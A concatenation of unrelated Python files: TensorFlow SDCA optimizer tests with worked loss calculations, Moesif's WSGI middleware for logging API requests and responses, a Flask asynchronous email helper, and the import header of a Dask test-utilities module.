# regularization and example weights, the predictions are within:
# 8 \cdot s_i /(\lambda + 8 \cdot s_i) of the labels.
self.assertAllClose(
[-10 * 40.0 / 41.0, 14.0 * 24 / 25.0], predictions.eval(), atol=0.01)
def testDenseFeaturesWithDefaultWeights(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0], [0.0]], [0.0, 1.0]],
weights=[1.0, 1.0],
labels=[10.0, -5.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The loss function for these particular features is given by:
# 1/2(label_1-w_1)^2 + 1/2(label_2-w_2)^2 + \lambda/2 (w_1^2 + w_2^2). So,
# differentiating wrt to w_1, w_2 yields the following optimal values:
# w_1* = label_1/(\lambda + 1)= 10/2, w_2* =label_2/(\lambda + 1)= -5/2.
# In this case the (unnormalized regularized) loss will be:
# 1/2(10-5)^2 + 1/2(5-5/2)^2 + 1/2(5^2 + (5/2)^2) = 125.0/4. The actual
# loss should be further normalized by the sum of example weights.
self.assertAllClose([5.0, -2.5], predictions.eval(), rtol=0.01)
loss = lr.regularized_loss(examples)
self.assertAllClose(125.0 / 8.0, loss.eval(), atol=0.01)
def testDenseFeaturesWithArbitraryWeights(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
weights=[20.0, 10.0],
labels=[10.0, -5.0])
options = dict(
symmetric_l2_regularization=5.0,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The loss function for these particular features is given by:
# 1/2 s_1 (label_1-w_1)^2 + 1/2 s_2(label_2-w_2)^2 +
# \lambda/2 (w_1^2 + w_2^2) where s_1, s_2 are the *example weights. It
# turns out that the optimal (variable) weights are given by:
# w_1* = label_1 \cdot s_1/(\lambda + s_1)= 8.0 and
# w_2* =label_2 \cdot s_2/(\lambda + s_2)= -10/3.
# In this case the (unnormalized regularized) loss will be:
# s_1/2(8-10)^2 + s_2/2(5-10/3)^2 + 5.0/2(8^2 + (10/3)^2) = 2175.0/9. The
# actual loss should be further normalized by the sum of example weights.
self.assertAllClose([8.0, -10.0 / 3], predictions.eval(), rtol=0.01)
loss = lr.regularized_loss(examples)
self.assertAllClose(2175.0 / 270.0, loss.eval(), atol=0.01)
class SdcaWithHingeLossTest(SdcaModelTest):
"""SDCA optimizer test class for hinge loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
predictions = model.predictions(examples)
self.assertAllClose([0.0, 0.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# After minimization, the model separates perfectly the data points. There
# are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender (say w3
# and w4). Solving the system w1 + w3 = 1.0, w2 + w4 = -1.0 and minimizing
# wrt to \|\vec{w}\|_2, gives w1=w3=1/2 and w2=w4=-1/2. This gives 0.0
# unregularized loss and 0.25 L2 loss.
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
binary_predictions = get_binary_predictions_for_hinge(predictions)
self.assertAllEqual([-1.0, 1.0], predictions.eval())
self.assertAllEqual([0, 1], binary_predictions.eval())
self.assertAllClose(0.0, unregularized_loss.eval())
self.assertAllClose(0.25, regularized_loss.eval(), atol=0.05)
def testDenseFeaturesPerfectlySeparable(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[1.0, 1.0], [1.0, -1.0]],
weights=[1.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
self.assertAllClose([1.0, -1.0], predictions.eval(), atol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
# (1.0, 1.0) and (1.0, -1.0) are perfectly separable by x-axis (that is,
# the SVM's functional margin >=1), so the unregularized loss is ~0.0.
# There is only loss due to l2-regularization. For these datapoints, it
# turns out that w_1~=0.0 and w_2~=1.0 which means that l2 loss is ~0.25.
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.0, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.25, regularized_loss.eval(), atol=0.02)
def testDenseFeaturesSeparableWithinMargins(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.5], [1.0, -0.5]]],
weights=[1.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
# (1.0, 0.5) and (1.0, -0.5) are separable by x-axis but the datapoints
# are within the margins so there is unregularized loss (1/2 per example).
# For these datapoints, optimal weights are w_1~=0.0 and w_2~=1.0 which
# gives an L2 loss of ~0.25.
self.assertAllClose([0.5, -0.5], predictions.eval(), rtol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.5, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.75, regularized_loss.eval(), atol=0.02)
def testDenseFeaturesWeightedExamples(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0], [1.0]], [[0.5], [-0.5]]],
weights=[3.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
# Point (1.0, 0.5) has higher weight than (1.0, -0.5) so the model will
# try to increase the margin from (1.0, 0.5). Due to regularization,
# (1.0, -0.5) will be within the margin. For these points and example
# weights, the optimal weights are w_1~=0.4 and w_2~=1.2 which give an L2
# loss of 0.5 * 0.25 * 1.6 = 0.2. The binary predictions will be
# correct, but the boundary will be much closer to the 2nd point than the
# first one.
self.assertAllClose([1.0, -0.2], predictions.eval(), atol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.2, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.4, regularized_loss.eval(), atol=0.02)
class SdcaWithSmoothHingeLossTest(SdcaModelTest):
"""SDCA optimizer test class for smooth hinge loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='smooth_hinge_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
predictions = model.predictions(examples)
self.assertAllClose([0.0, 0.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# After minimization, the model separates perfectly the data points. There
# are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender (say w3
# and w4). The minimization leads to w1=w3=1/3 and w2=w4=-1/3. This gives
# an unregularized hinge loss of 0.33 and a 0.11 L2 loss
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
binary_predictions = get_binary_predictions_for_hinge(predictions)
self.assertAllClose([-0.67, 0.67], predictions.eval(), atol=0.05)
self.assertAllEqual([0, 1], binary_predictions.eval())
self.assertAllClose(0.33, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.44, regularized_loss.eval(), atol=0.02)
class SdcaWithPoissonLossTest(SdcaModelTest):
"""SDCA optimizer test class for poisson loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 2),
]
example_weights = [100.0, 100.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='poisson_loss')
model = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 1 for each example.
predictions = model.predictions(examples)
self.assertAllClose([1.0, 1.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
approximate_duality_gap = model.approximate_duality_gap()
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# There are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender
# (say w3 and w4). The minimization leads to:
# w1=w3=-1.96487, argmin of 100*(exp(2*w)-2*w*0)+w**2.
# w2=w4=0.345708, argmin of 100*(exp(2*w)-2*w*2)+w**2.
# This gives an unregularized loss of .3167 and .3366 with regularization.
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
self.assertAllClose([0.0196, 1.9965], predictions.eval(), atol=1e-4)
self.assertAllClose(0.3167, unregularized_loss.eval(), atol=1e-4)
self.assertAllClose(0.3366, regularized_loss.eval(), atol=1e-4)
self.assertAllClose(0., approximate_duality_gap.eval(), atol=1e-6)
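# Worked check of the Poisson predictions above: the prediction is
# exp(w_age + w_gender) = exp(2w), so exp(2 * -1.96487) ~= 0.0196 and
# exp(2 * 0.345708) ~= 1.9965, matching the asserted values.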
class SdcaFprintTest(SdcaModelTest):
"""Tests for the SdcaFprint op.
This is one way of enforcing the platform-agnostic nature of SdcaFprint.
Basically we are checking against exact values and this test could be running
across different platforms. Note that it is fine for expected values to change
in the future, if the implementation of SdcaFprint changes (ie this is *not* a
frozen test).
"""
def testFprint(self):
with self._single_threaded_test_session():
in_data = constant_op.constant(['abc', 'very looooooong string', 'def'])
out_data = gen_sdca_ops.sdca_fprint(in_data)
self.assertAllEqual([[4143508125394299908, -6879828354153669051],
[5849691694103072671, -4874542629849009556],
[603227410218889250, 8762207001949257490]],
out_data.eval())
if __name__ == '__main__':
googletest.main()
middleware.py
# -*- coding: utf-8 -*-
import time
import datetime
import threading
import json
import base64
import re
import random
import itertools
from cStringIO import StringIO
from moesifapi.moesif_api_client import *
from moesifapi.api_helper import *
from moesifapi.exceptions.api_exception import *
from moesifapi.models import *
from .http_response_catcher import HttpResponseCatcher
from moesifpythonrequest.start_capture.start_capture import StartCapture
class DataHolder(object):
"""Capture the data for a request-response."""
def __init__(self, id, method, url, ip, user_id, metadata, session_token, request_headers, content_length, request_body):
self.request_id = id
self.method = method
self.url = url
self.ip_address = ip
self.user_id = user_id
self.metadata = metadata
self.session_token = session_token
self.request_headers = request_headers
self.content_length = content_length
self.request_body = request_body
self.status = -1
self.response_headers = None
self.response_chunks = None
self.response_body_data = None
self.request_time = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3]
self.start_at = time.time()
def capture_response_status(self, status, response_headers):
self.status = status
self.response_headers = response_headers
def capture_body_data(self, body_data):
if self.response_body_data is None:
self.response_body_data = body_data
else:
self.response_body_data = self.response_body_data + body_data
def finish_response(self, response_chunks):
self.response_time = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3]
self.response_chunks = response_chunks
new_response_chunks = []
stored_response_chunks = []
for line in response_chunks:
new_response_chunks.append(line)
stored_response_chunks.append(line)
self.response_chunks = stored_response_chunks
return new_response_chunks
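# Reading of finish_response above: a WSGI response iterable may be a one-shot
# generator, so the chunks are materialized exactly once into two equal lists --
# one handed back to the server and one kept on the holder for later logging.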
class MoesifMiddleware(object):
"""WSGI Middleware for recording of request-response"""
def __init__(self, app, settings):
self.app = app
self.request_counter = itertools.count().next # Threadsafe counter
self.ipv4 = r"^(?:(?:\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])\.){3}(?:\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])$"
self.ipv6 = r"^((?=.*::)(?!.*::.+::)(::)?([\dA-F]{1,4}:(:|\b)|){5}|([\dA-F]{1,4}:){6})((([\dA-F]{1,4}((?!\3)::|:\b|$))|(?!\2\3)){2}|(((2[0-4]|1\d|[1-9])?\d|25[0-5])\.?\b){4})$"
if settings is None:
raise Exception('Moesif Application ID is required in settings')
self.settings = settings
if settings.get('APPLICATION_ID', None):
self.client = MoesifAPIClient(settings.get('APPLICATION_ID'))
else:
raise Exception('Moesif Application ID is required in settings')
if settings.get('DEBUG', False):
Configuration.BASE_URI = settings.get('LOCAL_MOESIF_BASEURL', 'https://api.moesif.net')
self.DEBUG = settings.get('DEBUG', False)
if settings.get('CAPTURE_OUTGOING_REQUESTS', False):
try:
if self.DEBUG:
print('Start capturing outgoing requests')
# Start capturing outgoing requests
StartCapture().start_capture_outgoing(settings)
except:
print('Error while starting to capture the outgoing events')
self.api_version = settings.get('API_VERSION')
self.api_client = self.client.api
self.regex_http_ = re.compile(r'^HTTP_.+$')
self.regex_content_type = re.compile(r'^CONTENT_TYPE$')
self.regex_content_length = re.compile(r'^CONTENT_LENGTH$')
if self.DEBUG:
response_catcher = HttpResponseCatcher()
self.api_client.http_call_back = response_catcher
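# Illustrative wiring sketch (the application id and app below are hypothetical;
# only the settings keys read by this middleware are real):
#
#   moesif_settings = {
#       'APPLICATION_ID': 'your-moesif-application-id',  # required
#       'DEBUG': False,
#       'API_VERSION': '1.0',
#       'SAMPLING_PERCENTAGE': 100,
#       'CAPTURE_OUTGOING_REQUESTS': False,
#   }
#   # wsgi_app is whatever WSGI callable the service already exposes.
#   wsgi_app = MoesifMiddleware(wsgi_app, moesif_settings)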
def __call__(self, environ, start_response):
data_holder = DataHolder(
self.request_counter(),
environ['REQUEST_METHOD'],
self.request_url(environ),
self.get_client_address(environ),
self.get_user_id(environ),
self.get_metadata(environ),
self.get_session_token(environ),
[(k, v) for k,v in self.parse_request_headers(environ)],
*self.request_body(environ)
)
def _start_response(status, response_headers, *args):
# Capture status and response_headers for later processing
data_holder.capture_response_status(status, response_headers)
return start_response(status, response_headers, *args)
# data.capture_response_status(status, response_headers)
# write = start_response(status, response_headers, *args)
# def my_write(body_data):
# data.capture_body_data(body_data)
# print('inside my_write')
# print(body_data)
# write(body_data)
# return my_write
response_chunks = data_holder.finish_response(self.app(environ, _start_response))
def background_process():
try:
self.process_data(data_holder)
except Exception as e:
if self.DEBUG:
print('failed to process data, moving on')
print(e)
# return data to WSGI server
try:
return response_chunks
finally:
#background_process()
if not self.should_skip(environ):
sampling_percentage = float(self.settings.get("SAMPLING_PERCENTAGE", 100))
random_percentage = random.random() * 100
if sampling_percentage >= random_percentage:
sending_background_thread = threading.Thread(target=background_process)
sending_background_thread.start()
else:
if self.DEBUG:
print('skipped')
def process_data(self, data):
req_body = None
req_body_transfer_encoding = None
try:
if self.DEBUG:
print("about to process request body" + data.request_body)
if data.request_body:
req_body = json.loads(data.request_body)
except:
if data.request_body:
req_body = base64.standard_b64encode(data.request_body)
req_body_transfer_encoding = 'base64'
req_headers = None
if data.request_headers:
req_headers = dict(data.request_headers)
event_req = EventRequestModel(time=data.request_time,
uri=data.url,
verb=data.method,
api_version=self.api_version,
ip_address=data.ip_address,
headers=req_headers,
body=req_body,
transfer_encoding=req_body_transfer_encoding)
response_content = None
try:
response_content = "".join(data.response_chunks)
except:
if self.DEBUG:
print('try to join response chunks failed')
rsp_body = None
rsp_body_transfer_encoding = None
if self.DEBUG:
print("about to process response")
print(response_content)
if response_content:
try:
rsp_body = json.loads(response_content)
if self.DEBUG:
print("jason parsed succesfully")
except:
if self.DEBUG:
print("could not json parse, so base64 encode")
rsp_body = base64.standard_b64encode(response_content)
rsp_body_transfer_encoding = 'base64'
if self.DEBUG:
print("base64 encoded body: " + rsp_body)
rsp_headers = None
if data.response_headers:
rsp_headers = dict(data.response_headers)
response_status = None
if data.status:
response_status = int(data.status[:3])
event_rsp = EventResponseModel(time=data.response_time,
status=response_status,
headers=rsp_headers,
body=rsp_body,
transfer_encoding=rsp_body_transfer_encoding)
event_model = EventModel(request=event_req,
response=event_rsp,
user_id=data.user_id,
session_token=data.session_token,
metadata=data.metadata)
try:
mask_event_model = self.settings.get("MASK_EVENT_MODEL")
if mask_event_model is not None:
event_model = mask_event_model(event_model)
except:
if self.DEBUG:
print("Can not execute MASK_EVENT_MODEL function. Please check moesif settings.")
if self.DEBUG:
print("sending event to moesif")
print(APIHelper.json_serialize(event_model))
try:
self.api_client.create_event(event_model)
if self.DEBUG:
print("sent done")
except APIException as inst:
if 401 <= inst.response_code <= 403:
print("Unauthorized access sending event to Moesif. Please check your Appplication Id.")
if self.DEBUG:
print("Error sending event to Moesif, with status code:")
print(inst.response_code)
def is_ip(self, value):
return re.match(self.ipv4, value) or re.match(self.ipv6, value, re.IGNORECASE)
def getClientIpFromXForwardedFor(self, value):
try:
if value is None:
return None
if not isinstance(value, str):
raise TypeError("Expected a string, got -" + str(type(value)))
value = value.encode('utf-8')
# x-forwarded-for may return multiple IP addresses in the format:
# "client IP, proxy 1 IP, proxy 2 IP"
# Therefore, the right-most IP address is the IP address of the most recent proxy
# and the left-most IP address is the IP address of the originating client.
# source: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/x-forwarded-headers.html
# Azure Web Apps also adds a port for some reason, so we'll only use the first part (the IP)
forwardedIps = []
for e in value.split(','):
ip = e.strip()
if ':' in ip:
splitted = ip.split(':')
if (len(splitted) == 2):
forwardedIps.append(splitted[0])
forwardedIps.append(ip)
# Sometimes IP addresses in this header can be 'unknown' (http://stackoverflow.com/a/11285650).
# Therefore taking the left-most IP address that is not unknown
# A Squid configuration directive can also set the value to "unknown" (http://www.squid-cache.org/Doc/config/forwarded_for/)
return next(item for item in forwardedIps if self.is_ip(item))
except StopIteration:
return value.encode('utf-8')
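# Example of the parsing above (hypothetical header value): for
# 'X-Forwarded-For: 203.0.113.7:51111, unknown, 10.0.0.1' the port is stripped from
# the first entry and the left-most value that looks like an IP, '203.0.113.7',
# is returned.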
def get_client_address(self, environ):
try:
# Standard headers used by Amazon EC2, Heroku, and others.
if 'HTTP_X_CLIENT_IP' in environ:
if self.is_ip(environ['HTTP_X_CLIENT_IP']):
return environ['HTTP_X_CLIENT_IP']
# Load-balancers (AWS ELB) or proxies.
if 'HTTP_X_FORWARDED_FOR' in environ:
xForwardedFor = self.getClientIpFromXForwardedFor(environ['HTTP_X_FORWARDED_FOR'])
if self.is_ip(xForwardedFor):
return xForwardedFor
# Cloudflare.
# @see https://support.cloudflare.com/hc/en-us/articles/200170986-How-does-Cloudflare-handle-HTTP-Request-headers-
# CF-Connecting-IP - applied to every request to the origin.
if 'HTTP_CF_CONNECTING_IP' in environ:
if self.is_ip(environ['HTTP_CF_CONNECTING_IP']):
return environ['HTTP_CF_CONNECTING_IP']
# Akamai and Cloudflare: True-Client-IP.
if 'HTTP_TRUE_CLIENT_IP' in environ:
if self.is_ip(environ['HTTP_TRUE_CLIENT_IP']):
return environ['HTTP_TRUE_CLIENT_IP']
# Default nginx proxy/fcgi; alternative to x-forwarded-for, used by some proxies.
if 'HTTP_X_REAL_IP' in environ:
if self.is_ip(environ['HTTP_X_REAL_IP']):
return environ['HTTP_X_REAL_IP']
# (Rackspace LB and Riverbed's Stingray)
# http://www.rackspace.com/knowledge_center/article/controlling-access-to-linux-cloud-sites-based-on-the-client-ip-address
# https://splash.riverbed.com/docs/DOC-1926
if 'HTTP_X_CLUSTER_CLIENT_IP' in environ:
if self.is_ip(environ['HTTP_X_CLUSTER_CLIENT_IP']):
return environ['HTTP_X_CLUSTER_CLIENT_IP']
if 'HTTP_X_FORWARDED' in environ:
if self.is_ip(environ['HTTP_X_FORWARDED']):
return environ['HTTP_X_FORWARDED']
if 'HTTP_FORWARDED_FOR' in environ:
if self.is_ip(environ['HTTP_FORWARDED_FOR']):
return environ['HTTP_FORWARDED_FOR']
if 'HTTP_FORWARDED' in environ:
if self.is_ip(environ['HTTP_FORWARDED']):
return environ['HTTP_FORWARDED']
return environ['REMOTE_ADDR']
except KeyError:
return environ['REMOTE_ADDR']
def get_user_id(self, environ):
username = None
try:
identify_user = self.settings.get("IDENTIFY_USER")
if identify_user is not None:
username = identify_user(self.app, environ)
except Exception as e:
if self.DEBUG:
print("can not execute identify_user function, please check moesif settings.")
print(e)
return username
def get_metadata(self, environ):
metadata = None
try:
get_meta = self.settings.get("GET_METADATA")
if get_meta is not None:
metadata = get_meta(self.app, environ)
except Exception as e:
if self.DEBUG:
print("can not execute GET_METADATA function, please check moesif settings.")
print(e)
return metadata
def get_session_token(self, environ):
session_token = None
# try the standard method for getting session id.
# if 'HTTP_COOKIE' in environ:
# cookie = {s.split('=')[0].strip(): s.split('=')[1].strip() for s in environ['HTTP_COOKIE'].split(';')}
# session_token = cookie['sessionid']
# then see if get_session_token is implemented.
try:
get_session = self.settings.get("GET_SESSION_TOKEN")
if get_session is not None:
session_token = get_session(self.app, environ)
except Exception as e:
if self.DEBUG:
print("can not execute get_session function, please check moesif settings.")
print(e)
return session_token
def should_skip(self, environ):
try:
skip_proc = self.settings.get("SKIP")
if skip_proc is not None:
return skip_proc(self.app, environ)
else:
return False
except:
if self.DEBUG:
print("error trying to execute skip function.")
return False
def request_url(self, environ):
return '{0}{1}{2}'.format(
environ.get('SCRIPT_NAME', ''),
environ.get('PATH_INFO', ''),
'?' + environ['QUERY_STRING'] if environ.get('QUERY_STRING') else '',
)
_parse_headers_special = {
'HTTP_CGI_AUTHORIZATION': 'Authorization',
'CONTENT_LENGTH': 'Content-Length',
'CONTENT_TYPE': 'Content-Type',
}
def parse_request_headers(self, environ):
        for cgi_var, value in environ.items():
if cgi_var in self._parse_headers_special:
yield self._parse_headers_special[cgi_var], value
elif cgi_var.startswith('HTTP_'):
yield cgi_var[5:].title().replace('_', '-'), value
def request_body(self, environ):
content_length = environ.get('CONTENT_LENGTH')
body = None
if content_length:
if content_length == '-1':
# case where the content length is basically undetermined
body = environ['wsgi.input'].read(-1)
content_length = len(body)
else:
content_length = int(content_length)
body = environ['wsgi.input'].read(content_length)
environ['wsgi.input'] = StringIO(body) # reset request body for the nested app
else:
content_length = 0
return content_length, body
def update_user(self, user_profile):
if not user_profile:
            print('Expecting the input to be of type UserModel, dict, or a JSON string while updating a user')
else:
if isinstance(user_profile, dict):
if 'user_id' in user_profile:
try:
self.api_client.update_user(UserModel.from_dictionary(user_profile))
if self.DEBUG:
print('User Profile updated successfully')
except APIException as inst:
if 401 <= inst.response_code <= 403:
                            print("Unauthorized access sending event to Moesif. Please check your Application Id.")
if self.DEBUG:
print("Error while updating user, with status code:")
print(inst.response_code)
else:
                    print('To update a user, a user_id field is required')
elif isinstance(user_profile, UserModel):
if user_profile.user_id is not None:
try:
self.api_client.update_user(user_profile)
if self.DEBUG:
print('User Profile updated successfully')
except APIException as inst:
if 401 <= inst.response_code <= 403:
                            print("Unauthorized access sending event to Moesif. Please check your Application Id.")
if self.DEBUG:
print("Error while updating user, with status code:")
print(inst.response_code)
else:
                    print('To update a user, a user_id field is required')
else:
try:
user_profile_json = APIHelper.json_deserialize(user_profile)
if 'user_id' in user_profile_json:
try:
self.api_client.update_user(UserModel.from_dictionary(user_profile_json))
if self.DEBUG:
print('User Profile updated successfully')
except APIException as inst:
if 401 <= inst.response_code <= 403:
                                print("Unauthorized access sending event to Moesif. Please check your Application Id.")
if self.DEBUG:
print("Error while updating user, with status code:")
print(inst.response_code)
else:
                        print('To update a user, a user_id field is required')
except:
print('Error while deserializing the json, please make sure the json is valid')
def update_users_batch(self, user_profiles):
if not user_profiles:
            print('Expecting the input to be a list of UserModel, dict, or JSON strings while updating users')
else:
if all(isinstance(user, dict) for user in user_profiles):
if all('user_id' in user for user in user_profiles):
try:
batch_profiles = [UserModel.from_dictionary(d) for d in user_profiles]
self.api_client.update_users_batch(batch_profiles)
if self.DEBUG:
print('User Profile updated successfully')
except APIException as inst:
if 401 <= inst.response_code <= 403:
                            print("Unauthorized access sending event to Moesif. Please check your Application Id.")
if self.DEBUG:
print("Error while updating users, with status code:")
print(inst.response_code)
else:
                    print('To update users, a user_id field is required')
elif all(isinstance(user, UserModel) for user in user_profiles):
if all(user.user_id is not None for user in user_profiles):
try:
self.api_client.update_users_batch(user_profiles)
if self.DEBUG:
print('User Profile updated successfully')
except APIException as inst:
if 401 <= inst.response_code <= 403:
                            print("Unauthorized access sending event to Moesif. Please check your Application Id.")
if self.DEBUG:
print("Error while updating users, with status code:")
print(inst.response_code)
else:
                    print('To update users, a user_id field is required')
else:
try:
user_profiles_json = [APIHelper.json_deserialize(d) for d in user_profiles]
if all(isinstance(user, dict) for user in user_profiles_json) and all('user_id' in user for user in user_profiles_json):
try:
batch_profiles = [UserModel.from_dictionary(d) for d in user_profiles_json]
self.api_client.update_users_batch(batch_profiles)
if self.DEBUG:
print('User Profile updated successfully')
except APIException as inst:
if 401 <= inst.response_code <= 403:
                                print("Unauthorized access sending event to Moesif. Please check your Application Id.")
if self.DEBUG:
print("Error while updating users, with status code:")
print(inst.response_code)
else:
                        print('To update users, a user_id field is required')
except:
print('Error while deserializing the json, please make sure the json is valid')
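    # Usage sketch (illustrative, not from the original source): with a configured
    # instance of this middleware, user profiles can be pushed to Moesif one at a
    # time or in a batch; only the user_id key is required by the checks above.
    #
    #   middleware.update_user({'user_id': '12345'})
    #   middleware.update_users_batch([{'user_id': '1'}, {'user_id': '2'}])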
|
email.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# Author : Jianwei Fu
# E-mail : jianwei1031@gmail.com
# Date : 15/12/26 20:34:22
# Desc :
#
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
# mail.send(msg)
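# Usage sketch (illustrative; the recipient, subject, template name, and keyword
# arguments are assumptions about the calling code, not part of this module):
#
#   send_email(user.email, 'Confirm Your Account', 'auth/email/confirm',
#              user=user, token=token)
#
# renders 'auth/email/confirm.txt' and 'auth/email/confirm.html' with the given
# context and sends the message from a background thread, returning the Thread.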
|
utils_test.py
|
from __future__ import annotations
import asyncio
import copy
import functools
import gc
import inspect
import io
import logging
import logging.config
import multiprocessing
import os
import queue
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import uuid
import weakref
from collections import defaultdict
from collections.abc import Callable
from contextlib import contextmanager, nullcontext, suppress
from glob import glob
from itertools import count
from time import sleep
from typing import Any, Literal
from distributed.compatibility import MACOS
from distributed.scheduler import Scheduler
try:
import ssl
except ImportError:
ssl = None # type: ignore
import pytest
import yaml
from tlz import assoc, memoize, merge
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from distributed.comm.tcp import TCP
from . import system
from . import versions as version_module
from .client import Client, _global_clients, default_client
from .comm import Comm
from .comm.tcp import BaseTCPConnector
from .compatibility import WINDOWS
from .config import initialize_logging
from .core import CommClosedError, ConnectionPool, Status, connect, rpc
from .deploy import SpecCluster
from .diagnostics.plugin import WorkerPlugin
from .metrics import time
from .nanny import Nanny
from .node import ServerNode
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
DequeHandler,
TimeoutError,
_offload_executor,
get_ip,
get_ipv6,
iscoroutinefunction,
log_errors,
mp_context,
reset_logger_locks,
sync,
)
from .worker import Worker
try:
import dask.array # register config
except ImportError:
pass
logger = logging.getLogger(__name__)
